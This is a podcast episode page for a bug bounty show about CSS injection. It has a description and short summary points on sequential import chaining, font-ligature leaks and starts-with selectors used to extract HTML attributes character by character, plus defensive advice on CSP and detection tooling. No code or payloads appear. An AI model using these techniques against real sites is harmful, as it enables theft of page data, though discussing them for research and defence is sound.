Critical Thinking - Bug Bounty Podcast Episode 79: The State of CSS Injection - Leaking Text Nodes & HTML Attributes
6 snips
Jul 11, 2024 
YTCracker, an artist acclaimed for his contributions to music in tech and gaming, joins the conversation on CSS injection techniques. They dissect the art of sequential import chaining and delve into font ligatures that can leak information. The discussion reveals sophisticated strategies for exploiting CSS vulnerabilities, highlighting methods for extracting HTML attributes. Tune in for insights on effective content security measures and the evolving landscape of web technologies, sprinkled with YTCracker's creative flair!
AI Snips
Chapters
Transcript
Episode notes
Automate Client-Side Path Traversal Detection
- When building tools for client-side path traversal, automate detection of reflected parameters and subresource path influence.
- Use extensions or scanners to flag query/hash reflections that influence iframe/fetch/asset paths.
Sequential Import Chaining Works For Attributes
- Modern CSS injection can leak HTML attributes and text nodes using chained imports and CSS selectors.
- Sequential import chaining allows character-by-character extraction via CSS starts-with selectors.
Use CSP To Block CSS Exfiltration
- Use a strict Content Security Policy (CSP) to block remote CSS imports and custom fonts.
- Prevent CSS injection by disallowing untrusted stylesheet imports and font sources.